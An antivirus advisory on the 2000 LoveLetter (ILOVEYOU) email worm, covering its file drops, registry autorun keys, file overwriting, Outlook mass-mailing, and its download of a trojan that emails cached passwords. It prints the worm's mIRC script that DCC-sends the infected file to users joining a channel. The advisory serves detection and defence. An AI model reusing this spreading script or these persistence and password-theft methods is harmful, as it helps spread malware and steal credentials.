Virus Name: VBS/LoveLetter.worm Aliases: none known Date Discovered: Thursday May 4th 2000 DAT included: 4077 Risk: High Characteristics: This worm is a VBS program that is sent attached to an email with the subject ILOVEYOU. The mail contains the message "kindly check the attached LOVELETTER coming from me." The attachment is called LOVE-LETTER-FOR-YOU.TXT.vbs If the user runs the attachment the worm runs using the Windows Scripting Host program. This is not normally present on Windows 95 or Windows NT unless Internet Explorer 5 is installed. When the worm is first run it drops copies of itself in the following places :- C:\WINDOWS\SYSTEM\MSKERNEL32.VBS C:\WINDOWS\WIN32DLL.VBS C:\WINDOWS\SYSTEM\LOVE-LETTER-FOR-YOU.TXT.VBS It also adds the registry keys :- HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\ MSKernel32=C:\WINDOWS\SYSTEM\MSKernel32.vbs HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\ Win32DLL=C:\WINDOWS\Win32DLL.vbs in order to run the worm at system start-up. The worm replaces the following files :- *.JPG *.JPEG *.MP3 *.MP2 with copies of itself and it adds the extension .VBS to the original filename. So PICT.JPG would be replaced with PICT.JPG.VBS and this would contain the worm. The worm also overwrites the following files :- *.VBS *.VBE *.JS *.JSE *.CSS *.WSH *.SCT *.HTA with copies of itself and renames the files to *.VBS. The worm creates a file LOVE-LETTER-FOR-YOU.HTM which contains the worm and this is then sent to the IRC channels if the mIRC client is installed. This is accomplished by the worm replacing the file SCRIPT.INI with the following script :- [script] n0=on 1:JOIN:#:{ n1= /if ( $nick == $me ) { halt } n2= /.dcc send $nick C:\WINDOWS\SYSTEM\LOVE-LETTER-FOR-YOU.HTM n3=} After a short delay the worm uses Microsoft Outlook to send copies of itself to all entries in the address book. The mails will be of the same format as the original mail. This worm also has another trick up it's sleeve in that it tries to download and install an executable file called WIN-BUGSFIX.EXE from the Internet. This exe file is a password stealing program that will email any cached passwords to the mail address [log in to unmask] In order to facilitate this download the worm sets the start-up page of Microsoft Internet Explorer to point to the web-page containing the password stealing trojan. The email sent by this program is as follows :- From: [log in to unmask]: [log in to unmask]: Barok... email.passwords.sender.trojanX-Mailer: Barok... email.passwords.sender.trojan---by: spyderHost: goat1Username: Goat1IP Address: 192.168.0.2 RAS Passwords:... <password information goes here> ... Cache Passwords:... <password information goes here> ... goatserver.goatnet/goatserver.goatnet : GOATNET\goat1: MAPI : MAPI The password stealing trojan is also installed via the following registry key :- HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFIX to auto run at system start-up. After it has been run the password stealing trojan copies itself to WINDOWS\SYSTEM\WinFAT32.EXE and replaces the registry key with HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WinFAT32=Wi nFAT32.EXE